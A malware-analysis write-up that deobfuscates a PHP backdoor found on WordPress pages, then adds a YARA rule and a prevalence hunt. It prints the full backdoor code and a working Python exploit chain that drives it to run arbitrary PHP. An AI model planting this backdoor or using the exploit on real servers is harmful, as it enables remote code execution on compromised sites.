Analyzing (and weaponizing) a PHP botnet agent

Introduction

Recently, I gained access to a compromised WordPress site (or more likely, an old honeypot filled with malware). This presented a perfect opportunity to investigate how PHP botnets used to operate (and still do!).

These malware samples have been circulating around the web for a very long time, and it’s shocking that such a widely known threat still plays an important role in the malware distribution ecosystem.

The sample was discovered like a dead fish floating up to the surface: the PHP code was shown on top of 404-not-found pages. The reason? Who knows. Maybe a migration of the site, an exploitation failure, an error from the operator, or perhaps the botnet was dismantled and is no longer active.

In this post, I’ll walk through the process of analyzing and dissecting this PHP botnet code, examining how attackers have historically abused and weaponized compromised WordPress sites to build their botnets. I’ll also try to recreate how these C2 agents are operated.

Finally, I’ll explore the broader implications of this threat by assessing its prevalence across the web, using YARA-based retrohunting on VirusTotal and targeted Google searches.

Deobfuscation

This is a picture of the original sample I found:

A bit obfuscated, but it’s PHP and not so complex to analyze.

Initial Beautification

Since we’re dealing with PHP code, the first step is to improve its readability. I used an online PHP beautifier from beautifytools.

I needed to add the <?php tag at the beginning of the file.

The beautified file contains 467 lines of code.

Automated Deobfuscation

I tested several tools for automatic deobfuscation. The best results came from reverse-php-malware by bediger4000.

After beautifying the output again, the file was reduced to 446 lines with various variable substitutions.

Code Pattern Analysis

The code appears to be repeated seven times with different randomly generated variable names. These modifications were likely introduced by the obfuscation tool / builder.

I divided the file into 7 smaller snippets that follow the same pattern.

$ wc php_botnet_[1-7].php
   64   222  2552 php_botnet_1.php
   66   242  2667 php_botnet_2.php
   63   220  2450 php_botnet_3.php
   63   214  2413 php_botnet_4.php
   63   267  2720 php_botnet_5.php
   62   229  2446 php_botnet_6.php
   64   222  2623 php_botnet_7.php
  445  1616 17871 total

Manual Deobfuscation

A local PHP shell can help us decode obfuscated strings:

php > $rOujMiLGI = 'clas' . chr(632 - 517) . chr(217 - 122) . 'exists';
php > echo $rOujMiLGI;
class_exists

We can use this technique to resolve all remaining obfuscated strings throughout the code.
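
When there are many strings to resolve, the same trick can be scripted. The following is a minimal Python sketch, not part of the original tooling: resolve_php_concat() is a hypothetical helper, and it assumes the obfuscator only emits single-quoted literals and chr(a - b) or chr(a + b) calls joined with the dot operator.

```python
import re

# Matches either a single-quoted literal or a chr(<int> <op> <int>) call.
TOKEN = re.compile(r"'([^']*)'|chr\(\s*(\d+)\s*([+-])\s*(\d+)\s*\)")

def resolve_php_concat(expr: str) -> str:
    """Resolve a PHP concatenation of literals and chr() arithmetic (hypothetical helper)."""
    pieces = []
    for match in TOKEN.finditer(expr):
        if match.group(1) is not None:
            # Plain string literal: keep it as-is.
            pieces.append(match.group(1))
        else:
            a, op, b = int(match.group(2)), match.group(3), int(match.group(4))
            value = a - b if op == "-" else a + b
            # PHP's chr() wraps its argument modulo 256.
            pieces.append(chr(value % 256))
    return "".join(pieces)

print(resolve_php_concat("'clas' . chr(632 - 517) . chr(217 - 122) . 'exists'"))
```

Run against the line from the PHP shell session above, it prints class_exists.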

Initial Code Analysis

The first part appears identical across all seven code variants (with different variable names):

$JwnMvjTlt = 'D_nrl';
$rOujMiLGI = 'class_exists';
$rmjDtqOlI = class_exists($JwnMvjTlt);
$rOujMiLGI = '14281';
$zPfeGqPXz = strpos('14281', 'D_nrl');
if ($rmjDtqOlI == $zPfeGqPXz) {
    // rest of the code
}

After substituting variables, the only noise left is $rOujMiLGI, which is assigned twice but never actually used. It is only there to complicate analysis and can be eliminated:

$rOujMiLGI = 'class_exists';
$rOujMiLGI = '14281';
if (class_exists('D_nrl') == strpos('14281', 'D_nrl')) {
    // rest of the code
}

The actual condition simplifies to:

if (class_exists('D_nrl') == strpos('14281', 'D_nrl')) {
    // rest of the code
}

The strpos() function searches for “D_nrl” in “14281”, which will always return false. Therefore, the condition becomes:

if (class_exists('D_nrl') == false) {
    // rest of the code
}

The class_exists() function checks if the class “D_nrl” exists in the current PHP environment. This entire block serves as a one-time execution check, with deliberately confusing comparisons to evade static code analysis or make reverse engineering more challenging.

Core Functionality

The next section contains a function, a class definition, a variable declaration, and a function call:

function EtkaemkTDw() {
    // ...
}
$mzoDChjlh = '33115';
class D_nrl {
    // ...
}
EtkaemkTDw();

For clarity, I’ve renamed EtkaemkTDw() to init() since it initializes execution. This function simply instantiates a new class with the value 33115 + 33115 (66230):

function init() {
    $fniPN = new D_nrl(33115 + 33115);
    $fniPN = null;
}

According to the PHP manual, the constructor method is called on each newly-created object, making it perfect for initialization operations.

Class Structure Analysis

The class contains both the functions __construct() and __destruct(), as well as other methods and variables.

class D_nrl {
    private function sUZcNV($mzoDChjlh) {}
    public function kGnmOo() {}
    public function __destruct() {}
    public function BpJQpTdwfY($eTwDpFJI, $VpuPvEqNf) {}
    public function enSQQgXymq($eTwDpFJI) {}
    public function __construct($AfOrpPu = 0) {}
    public static $UFvzjxeE = 62542;
}

The kGnmOo() method is unused and can be eliminated:

public function kGnmOo() {
    $data = '53428';
    $this->_dummy = str_repeat($data, strlen($data));
}

The BpJQpTdwfY() method XORs a string (the first element of an array) with what appears to be a key. The key is repeated until it is at least as long as the string.

public function BpJQpTdwfY($eTwDpFJI, $VpuPvEqNf) {
    return $eTwDpFJI[0] ^ str_repeat($VpuPvEqNf, intval(strlen($eTwDpFJI[0]) / strlen($VpuPvEqNf)) + 1);
}

Renaming for clarity:

public function xor($data, $key) {
    return $data[0] ^ str_repeat($key, intval(strlen($data[0]) / strlen($key)) + 1);
}
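
To make the behaviour of this method concrete, here is a rough Python equivalent. It is a sketch under the assumption that both operands are plain byte strings; php_xor() is my own name, not something from the sample. PHP’s ^ operator on two strings stops at the shorter operand, which zip() reproduces.

```python
def php_xor(data: bytes, key: bytes) -> bytes:
    """Approximate PHP's string XOR with a repeated key (illustrative name)."""
    # Repeat the key so it is at least as long as the data, as str_repeat() does.
    repeated = key * (len(data) // len(key) + 1)
    # zip() stops at the shorter input, matching PHP's string ^ string behaviour.
    return bytes(d ^ k for d, k in zip(data, repeated))

key = b"5db5f694-e20d-4e23-b0b6-4e7f09687865"
plain = b'a:1:{s:3:"key";s:5:"value";}'
cipher = php_xor(plain, key)

# XOR is its own inverse, so the same function encrypts and decrypts.
print(php_xor(cipher, key) == plain)
```

Because XOR is symmetric, whoever knows the key can produce data that this method will "decrypt" into anything they like.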

The enSQQgXymq() function is clearly a base64 decoder that returns an array (by using array_map). I’ve renamed it to b64_decode():

public function b64_decode($data) {
    return array_map('base64_decode', [$data]);
}

Constructor Analysis

The __construct() function takes an unused parameter that can be removed:

public function __construct($AfOrpPu = 0) {
    $data = '';
    $npkQFOsND = $_POST;
    $FOmTmKK = $_COOKIE;
    $key = '5db5f694-e20d-4e23-b0b6-4e7f09687865';
    $HlEIDr = @$FOmTmKK[substr($key, 0, 4) ];
    if (!empty($HlEIDr)) {
        $HlEIDr = explode(',', $HlEIDr);
        foreach ($HlEIDr as $AQBahfuzGX) {
            $data .= @$FOmTmKK[$AQBahfuzGX];
            $data .= @$npkQFOsND[$AQBahfuzGX];
        }
        $data = $this->b64_decode($data);
    }
    D_nrl::$UFvzjxeE = $this->xor($data, $key);
    if (strpos('5db5f694-e20d-4e23-b0b6-4e7f09687865', ',') !== false) {
        $key = ltrim($key);
        $key = str_pad($key, 10);
    }
}

The final conditional (strpos('5db5f694-e20d-4e23-b0b6-4e7f09687865', ',') !== false) is a dead end in this sample, since the key contains no comma. It is probably only relevant on deployments with custom keys, or maybe it is just another obfuscation trick that masks the code’s true functionality.

After renaming and simplification:

public function __construct() {
    $data = '';
    $data_post = $_POST;
    $data_cookie = $_COOKIE;
    $key = '5db5f694-e20d-4e23-b0b6-4e7f09687865';
    $cookie_value = @$data_cookie['5db5'];
    if (!empty($cookie_value)) {
        $cookie_value = explode(',', $cookie_value);
        foreach ($cookie_value as $index_name) {
            $data .= @$data_cookie[$index_name];
            $data .= @$data_post[$index_name];
        }
        $data = $this->b64_decode($data);
    }
    D_nrl::$decrypted_data = $this->xor($data, $key);
}

This function checks for a cookie named “5db5”, then extracts index names by splitting its value on commas. It constructs a data string by concatenating values from both cookies and POST data with those index names. Finally, it base64-decodes and XORs the data with a UUID key, storing the result in the class’ static variable.

This example effectively illustrates how the data is collected:

data_cookies = {
    "5db5": "name1,name2,name3",
    "name1": "value_cookies_1",
    "name2": "value_cookies_2",
    "name3": "value_cookies_3",
}
data_post = {
    "name1": "value_post_1",
    "name2": "value_post_2",
    "name3": "value_post_3",
}
data = "value_cookies_1value_post_1value_cookies_2value_post_2value_cookies_3value_post_3"
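
The collection logic can also be simulated outside PHP. This is a minimal Python sketch of what the constructor does before decoding; collect_payload() is an illustrative name, and the dictionaries stand in for $_COOKIE and $_POST.

```python
def collect_payload(cookies: dict, post: dict, key: str) -> str:
    """Rebuild the raw data string the way the constructor does (illustrative)."""
    # The index cookie is named after the first 4 characters of the key.
    index = cookies.get(key[:4], "")
    # PHP's empty() treats both "" and "0" as empty.
    if index in ("", "0"):
        return ""
    data = ""
    for name in index.split(","):
        # For every index name: cookie value first, then POST value.
        data += cookies.get(name, "")
        data += post.get(name, "")
    return data

cookies = {
    "5db5": "name1,name2,name3",
    "name1": "value_cookies_1",
    "name2": "value_cookies_2",
    "name3": "value_cookies_3",
}
post = {
    "name1": "value_post_1",
    "name2": "value_post_2",
    "name3": "value_post_3",
}
print(collect_payload(cookies, post, "5db5f694-e20d-4e23-b0b6-4e7f09687865"))
```

Missing names simply contribute an empty string, which mirrors the @-suppressed array lookups in the PHP code.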

Destruction

The init function creates a new instance of the “D_nrl” class, which triggers the __construct method. It then sets the instance to null, which calls the __destruct method:

function init() {
    $fniPN = new D_nrl();
    $fniPN = null;
}

The __destruct method also contains code elements meant purely for obfuscation. The variable $mzoDChjlh is assigned twice and passed to sUZcNV(), but its value is never actually used:

public function __destruct() {
    D_nrl::$decrypted_data = @unserialize(D_nrl::$decrypted_data);
    $mzoDChjlh = '50014_10810';
    $this->sUZcNV($mzoDChjlh);
    $mzoDChjlh = '50014_10810';
}

After cleaning up the unnecessary elements, the function becomes:

public function __destruct() {
    D_nrl::$decrypted_data = @unserialize(D_nrl::$decrypted_data);
    $this->sUZcNV();
}

The unserialize() function recreates a PHP value from its stored representation. For example, the array:

array(
    "key" => "value"
)

When serialized becomes:

a:1:{s:3:"key";s:5:"value";}

The unserialize() function performs the reverse operation. After unserializing the data, the code calls the private function sUZcNV(), which contains the malware’s core functionality and where the fun happens.
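
To make the serialized format concrete, here is a minimal Python sketch of a parser for it. It only handles the three types relevant to this sample (strings, integers, and arrays) and is nowhere near a full reimplementation of PHP’s unserialize(); the function names are my own.

```python
def _parse(data: bytes, pos: int):
    """Parse one value starting at pos; return (value, next_pos)."""
    kind = data[pos:pos + 2]
    if kind == b"i:":
        end = data.index(b";", pos)
        return int(data[pos + 2:end]), end + 1
    if kind == b"s:":
        colon = data.index(b":", pos + 2)
        length = int(data[pos + 2:colon])  # length is counted in bytes
        start = colon + 2                  # skip the ':' and the opening '"'
        end = start + length
        if data[end:end + 2] != b'";':
            raise ValueError("malformed string")
        return data[start:end].decode(errors="replace"), end + 2
    if kind == b"a:":
        colon = data.index(b":", pos + 2)
        count = int(data[pos + 2:colon])
        pos = colon + 2                    # skip the ':' and the opening '{'
        result = {}
        for _ in range(count):
            k, pos = _parse(data, pos)
            v, pos = _parse(data, pos)
            result[k] = v
        if data[pos:pos + 1] != b"}":
            raise ValueError("malformed array")
        return result, pos + 1
    raise ValueError("unsupported type")

def php_unserialize(data: bytes):
    """Tiny subset of PHP's unserialize(): strings, integers, arrays."""
    value, pos = _parse(data, 0)
    if pos != len(data):
        raise ValueError("trailing data")
    return value

print(php_unserialize(b'a:1:{s:3:"key";s:5:"value";}'))
```

For the example above this yields a dictionary with the single entry "key" mapped to "value".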

Core Execution

This private function first verifies that the decrypted data is an array:

private function sUZcNV() {
    if (is_array(D_nrl::$decrypted_data)) {
        $name = sys_get_temp_dir() . '/' . crc32(D_nrl::$decrypted_data['salt']);
        @D_nrl::$decrypted_data['write']($name, D_nrl::$decrypted_data['content']);
        include $name;
        @D_nrl::$decrypted_data['delete']($name);
        exit;
    }
}

The decrypted array must have the following structure:

array(
    "salt" => "value",
    "write" => "value",
    "content" => "value",
    "delete" => "value",
)

The function builds a temporary file path from sys_get_temp_dir() and the crc32() checksum of the salt value.

Next, it dynamically calls the function specified in the write key with the filename and content as arguments. This approach likely uses a function like file_put_contents() without explicitly naming it, helping the malware evade detection that looks for suspicious function calls.

The code then includes the newly created temporary file, executing whatever PHP code was written to it.

Finally, it attempts to delete the file (probably using the unlink() function) and exits the script to prevent further execution.
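
Since the file name depends only on the salt, the staging path is predictable for anyone who sees the decrypted payload. A small Python sketch of that computation follows; staged_path() is a hypothetical helper, and the "/tmp" default is an assumption about what sys_get_temp_dir() returns on a typical Linux host.

```python
import posixpath
import zlib

def staged_path(salt: str, temp_dir: str = "/tmp") -> str:
    """Predict where the payload is staged (hypothetical helper)."""
    # zlib.crc32() returns an unsigned 32-bit integer, which is what PHP's
    # crc32() returns on 64-bit builds. 32-bit PHP builds may yield negative
    # numbers instead, so treat this as an approximation.
    checksum = zlib.crc32(salt.encode())
    return posixpath.join(temp_dir, str(checksum))

print(staged_path("asdf"))
```

The file only exists for the duration of the request, so this is more useful for correlating logs or sandbox traces than for finding leftovers on disk.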

Stealth Techniques

The code uses the “at sign” (@) operator in several places to suppress error messages.

According to the Error Control Operators section in the PHP manual:

PHP supports one error control operator: the at sign (@). When prepended to an expression in PHP, any diagnostic error that might be generated by that expression will be suppressed.

This technique helps the malware operate silently without generating error messages that might alert administrators.

Summary

After deobfuscation and renaming for clarity, the full malware functionality becomes much clearer:

<?php
if (class_exists('Malware') == false) {
    function init() {
        $obj = new Malware();
        $obj = null;
    }
    class Malware {
        private function execute() {
            if (is_array(Malware::$decrypted_data)) {
                $name = sys_get_temp_dir() . '/' . crc32(Malware::$decrypted_data['salt']);
                @Malware::$decrypted_data['write']($name, Malware::$decrypted_data['content']);
                include $name;
                @Malware::$decrypted_data['delete']($name);
                exit;
            }
        }
        public function __destruct() {
            Malware::$decrypted_data = @unserialize(Malware::$decrypted_data);
            $this->execute();
        }
        public function xor($data, $key) {
            return $data[0] ^ str_repeat($key, intval(strlen($data[0]) / strlen($key)) + 1);
        }
        public function b64_decode($data) {
            return array_map('base64_decode', [$data]);
        }
        public function __construct() {
            $data = '';
            $data_post = $_POST;
            $data_cookie = $_COOKIE;
            $key = '5db5f694-e20d-4e23-b0b6-4e7f09687865';
            $cookie_value = @$data_cookie['5db5'];
            if (!empty($cookie_value)) {
                $cookie_value = explode(',', $cookie_value);
                foreach ($cookie_value as $index_name) {
                    $data .= @$data_cookie[$index_name];
                    $data .= @$data_post[$index_name];
                }
                $data = $this->b64_decode($data);
            }
            Malware::$decrypted_data = $this->xor($data, $key);
        }
        public static $decrypted_data = 62542;
    }
    init();
}

Interpolate

After understanding the core functionality, I compared all seven code snippets to identify variations. While most code elements remained identical across versions (with only the UUID keys changing), I discovered some differences in the execute function.

Some variants used a more direct approach to execute the payload:

private function execute() {
    if (is_array(Malware::$decrypted_data)) {
        $data_to_eval = str_replace("<" . '?php', "", Malware::$decrypted_data['content']);
        eval($data_to_eval);
        exit;
    }
}

In this implementation, the malware directly evaluates the content using the eval() function after stripping any PHP opening tags. I assume this was an earlier version of the malware, as it uses a more straightforward but easily detectable approach.

Warning extracted from the PHP manual:

Warning

The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. If you have carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it without properly validating it beforehand.

My analysis of all seven variants revealed this pattern:

1_deobfuscated.php -> version 2 (include)
2_deobfuscated.php -> version 1 (eval)
3_deobfuscated.php -> version 1 (eval)
4_deobfuscated.php -> version 1 (eval)
5_deobfuscated.php -> version 2 (include)
6_deobfuscated.php -> version 1 (eval)
7_deobfuscated.php -> version 2 (include)

This suggests the malware authors evolved their code over time, moving from the more detectable eval() approach to the more subtle temporary file method, likely to evade security scanners that specifically flag direct use of the eval() function.
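
Sorting snippets into these two versions is easy to automate once they are deobfuscated. The sketch below is a rough heuristic, assuming the function names are visible in plain text; classify_variant() is an illustrative name and the checks are deliberately simple.

```python
import re

def classify_variant(source: str) -> str:
    """Rough triage of a deobfuscated snippet (illustrative heuristic)."""
    # Version 1 evaluates the content directly.
    if re.search(r"\beval\s*\(", source):
        return "version 1 (eval)"
    # Version 2 stages the content in a temp file and includes it.
    if "sys_get_temp_dir" in source and re.search(r"\binclude\b", source):
        return "version 2 (include)"
    return "unknown"

sample_v1 = "eval($data_to_eval); exit;"
sample_v2 = "$name = sys_get_temp_dir() . '/' . crc32($salt); include $name;"
print(classify_variant(sample_v1))
print(classify_variant(sample_v2))
```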

Weaponizing the backdoor

For this proof of concept, I’ll host the malware on localhost using PHP’s built-in web server:

php -S localhost:8000 malware.php

I modified the UUID key in the malware code to "00000000-0000-0000-0000-000000000000" for testing purposes.

Exploit Development Strategy

The plan for building the exploit is just to reverse all the previous steps. Here’s the conceptual flow:

exploit:
payload_parts -> payload_base64 -> payload_encrypted -> payload_serialized -> payload_unserialized

builder:
payload_unserialized -> payload_serialized -> payload_encrypted -> payload_base64 -> payload_parts

The unserialized payload requires a specific format before code execution:

array(
    "salt" => "value",
    "write" => "value",
    "content" => "value",
    "delete" => "value",
)

We can use file_put_contents for the write function and unlink for the delete function. The salt can be any random data, and the content will be our malicious payload to execute. This gives us:

array(
    "salt" => "asdf",
    "write" => "file_put_contents",
    "content" => "<?php echo 'pwn' ?>",
    "delete" => "unlink",
)

Serialization

I decided to write a simple Python script to join everything together.

The payload array needs to be serialized so it can be properly unserialized by the malware. While there are many serialization examples available online, here’s a minimal implementation for our specific case:

def php_serialize(obj):
    """
    Simple PHP-like serialization for basic data types
    Supports strings, integers, and dictionaries
    """
    if isinstance(obj, str):
        # PHP stores the string length in bytes, not characters
        return f's:{len(obj.encode())}:"{obj}";'
    elif isinstance(obj, int):
        return f'i:{obj};'
    elif isinstance(obj, dict):
        serialized = f'a:{len(obj)}:{{'
        for k, v in obj.items():
            serialized_key = php_serialize(k)
            serialized_value = php_serialize(v)
            serialized += f'{serialized_key}{serialized_value}'
        serialized += '}'
        return serialized
    else:
        raise ValueError(f"Unsupported type for serialization: {type(obj)}")

For example, our Python object:

payload = {
    "salt": "asdf",
    "write": "file_put_contents",
    "content": "<?php echo 'pwn' ?>",
    "delete": "unlink"
}

Will be serialized as:

'a:4:{s:4:"salt";s:4:"asdf";s:5:"write";s:17:"file_put_contents";s:7:"content";s:19:"<?php echo \'pwn\' ?>";s:6:"delete";s:6:"unlink";}'

Encryption

The next step is to XOR encrypt the serialized payload with the key hardcoded in the malware. This key is a unique UUID that would be practically impossible to brute-force in a real-world scenario (we don’t know the source of randomness used by the generator).

My Python implementation closely mirrors the original PHP code:

def xor_encrypt(data, key):
    extended_key = (key * (len(data) // len(key) + 1))[:len(data)]
    xored = bytes([a ^ b for a, b in zip(data.encode(), extended_key.encode())])
    return xored

Base64 Encoding

Next, we encode the encrypted payload with Base64:

>>> base64.b64encode(xored).decode()
'UQoECktDCgQXEkNRXFkSC0MKGQoSUUNJVhILQwoFChJHQllEVRILQwoBBwoPVllcVXJARURvTl9eRFVDREMSC0MKBwoSU19eRFVeRBILQwocCQoSDBJAWEAQSFNYXxAKQEdeFxAPDhILQwoGChJUVVxVRFUPC0MKBhcSRV5cRF5bEgtQ'

This encoded payload will then be distributed across multiple HTTP parameters (cookies and post data) as specified in the malware’s data collection mechanism.
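
Putting the three builder steps together, a self-contained sketch could look like the following. It repeats a trimmed-down serializer (strings and dictionaries only) so it runs on its own, and build_payload() is an illustrative name rather than the exact script used for this post.

```python
import base64

def php_serialize(obj) -> str:
    """Trimmed-down PHP serializer: strings and dictionaries only."""
    if isinstance(obj, str):
        return f's:{len(obj.encode())}:"{obj}";'
    if isinstance(obj, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in obj.items())
        return f"a:{len(obj)}:{{{body}}}"
    raise ValueError(f"Unsupported type: {type(obj)}")

def build_payload(payload: dict, key: str) -> str:
    """serialize -> XOR with the repeated key -> Base64 (illustrative)."""
    serialized = php_serialize(payload).encode()
    repeated = (key * (len(serialized) // len(key) + 1)).encode()
    xored = bytes(a ^ b for a, b in zip(serialized, repeated))
    return base64.b64encode(xored).decode()

test_key = "00000000-0000-0000-0000-000000000000"
payload = {
    "salt": "asdf",
    "write": "file_put_contents",
    "content": "<?php echo 'pwn' ?>",
    "delete": "unlink",
}
encoded = build_payload(payload, test_key)
print(encoded)
```

With the all-zero test key, most bytes are simply XORed with the character "0", which is why the encoded text looks so repetitive.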

Exploit!

To exploit the implanted code, we need to craft a specially formatted HTTP request.

There must be a cookie named after the first 4 characters of the key, in our test case "0000".

The value of this cookie is a comma-separated list of index names, each of which can be a cookie name or a POST field name. The values stored under those names are concatenated in order. We can be creative in distributing the payload across different cookies or POST fields, but the easiest way is to just put everything in a single cookie.

And the final request will look something like this:

import requests

cookies = {
    "0000": "boring_cookie",
    "boring_cookie": "UQoECktDCgQXEkNRXFkSC0MKGQoSUUNJVhILQwoFChJHQllEVRILQwoBBwoPVllcVXJARURvTl9eRFVDREMSC0MKBwoSU19eRFVeRBILQwocCQoSDBJAWEAQSFNYXxAKQEdeFxAPDhILQwoGChJUVVxVRFUPC0MKBhcSRV5cRF5bEgtQ"
}
r = requests.post("http://127.0.0.1:8000", cookies=cookies)
# Show whatever the injected PHP code printed
print(r.text)

PoC||GTFO:

$ python3 exploit.py
pwn

Nice! An over-complicated way to print “pwn” :D
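
The payload does not have to travel in a single cookie. As a sketch of the "creative" option, the hypothetical split_payload() helper below spreads the Base64 text over several index names, alternating between a cookie and a POST field for each name, which is the order in which the malware concatenates them. The names used here are made up for illustration.

```python
def split_payload(b64: str, key: str, names: list) -> tuple:
    """Spread a Base64 payload over cookies and POST fields (hypothetical helper)."""
    parts = 2 * len(names)               # one cookie chunk + one POST chunk per name
    size = -(-len(b64) // parts)         # ceiling division
    chunks = [b64[i * size:(i + 1) * size] for i in range(parts)]
    # The index cookie is named after the first 4 characters of the key.
    cookies = {key[:4]: ",".join(names)}
    post = {}
    for i, name in enumerate(names):
        cookies[name] = chunks[2 * i]    # read first by the malware
        post[name] = chunks[2 * i + 1]   # appended right after
    return cookies, post

cookies, post = split_payload("QUJDREVGR0hJSktMTU5PUA==",
                              "00000000-0000-0000-0000-000000000000",
                              ["session", "lang", "theme"])
print(cookies)
print(post)
```

The two dictionaries can then be passed to requests.post() through its cookies= and data= parameters.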

Botnet: The Big Picture

Assessing the Malware’s Prevalence

The fact that there are seven different failed infections on a single page suggested a much wider campaign targeting multiple websites. Let’s hunt.

To investigate further, I created a YARA rule to identify similar infections:

rule yara_template {
  meta:
    target_entity = "file"
  strings:
    $s1 = "class_exists"
    $s2 = "empty"
    $s3 = "intval(strlen($"
    $s4 = "@unserialize"
    $s5 = "__construct"
    $s6 = "__destruct"
    $s7 = "is_array"
    $s8 = "exit"

    /* version 1 */
    //$o1 = "eval"
    /* version 2 */
    //$o2_1 = "sys_get_temp_dir() . \"/\" . crc32"
    //$o2_2 = "include"

    /* uuid regex */
    $re = /[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/

  condition:
    all of ($s*) and
    $re
}

This rule targets the backdoor’s distinctive characteristics: the use of class constructors and destructors for execution, the serialization mechanisms, and the UUID-based authentication system.
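
For quick local triage without a YARA engine, the same condition can be approximated in a few lines of Python. This is only a sketch of the rule’s logic (all eight strings plus the UUID pattern), not a replacement for YARA; looks_like_backdoor() is an illustrative name.

```python
import re

# Same strings as $s1..$s8 in the rule above.
REQUIRED = [
    "class_exists", "empty", "intval(strlen($", "@unserialize",
    "__construct", "__destruct", "is_array", "exit",
]
# Same pattern as $re in the rule above.
UUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}")

def looks_like_backdoor(source: str) -> bool:
    """True when every required string and a lowercase UUID are present."""
    has_strings = all(s in source for s in REQUIRED)
    return has_strings and UUID_RE.search(source) is not None

sample = (
    "if (class_exists('X') == false) { class X { "
    "function __construct() { if (!empty($c)) {} "
    "$k = '5db5f694-e20d-4e23-b0b6-4e7f09687865'; "
    "intval(strlen($d[0]) / strlen($k)); } "
    "function __destruct() { @unserialize($d); if (is_array($d)) { exit; } } } }"
)
print(looks_like_backdoor(sample))
print(looks_like_backdoor("<?php echo 'hello'; ?>"))
```

Like the rule itself, this is prone to false positives on legitimate code that happens to contain the same generic strings, so hits still need a manual look.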

Retrohunt Results

I decided to run a VirusTotal retrohunt query using the YARA rule:

Every hit looks exactly the same: similar random variable names, the key strings from the YARA rule, a UUID key, and the same pattern of code prepended to HTML pages.

The retrohunt job only covers the last 90 days of data. The oldest “First seen” date among the hits is mid-2024, but the botnet may be older.

Based on the number of results, we can assume that there may be thousands of compromised websites.

Google Search

To supplement the retrohunt findings, I performed targeted Google searches using distinct code fragments from the backdoor:

Simple Google searches for similar samples revealed numerous hits

Example query: "intval(strlen($"

There are a lot of false positives because this PHP snippet is quite generic, but the compromised sites are very easy to spot.

What’s particularly concerning is that these search results primarily reveal broken or detected instances of the backdoor. The actual number of successfully compromised sites likely far exceeds these visible cases, as properly functioning backdoors remain hidden from casual inspection.

Conclusion

This analysis reveals a PHP backdoor campaign that has likely compromised thousands of websites since at least 2024. The malware employs effective obfuscation techniques and a multi-stage execution process that makes detection challenging.

The infected websites likely serve multiple purposes in cybercriminal operations: forming a distributed botnet infrastructure, facilitating shady SEO tactics, redirecting phishing campaigns using legitimate domains, and distributing malware to unsuspecting visitors. I like to think of these types of botnets as malware CDNs.

The persistence of this backdoor demonstrates that even relatively simple PHP malware can stay effective when deployed at scale, and that it remains an important actor in malware distribution.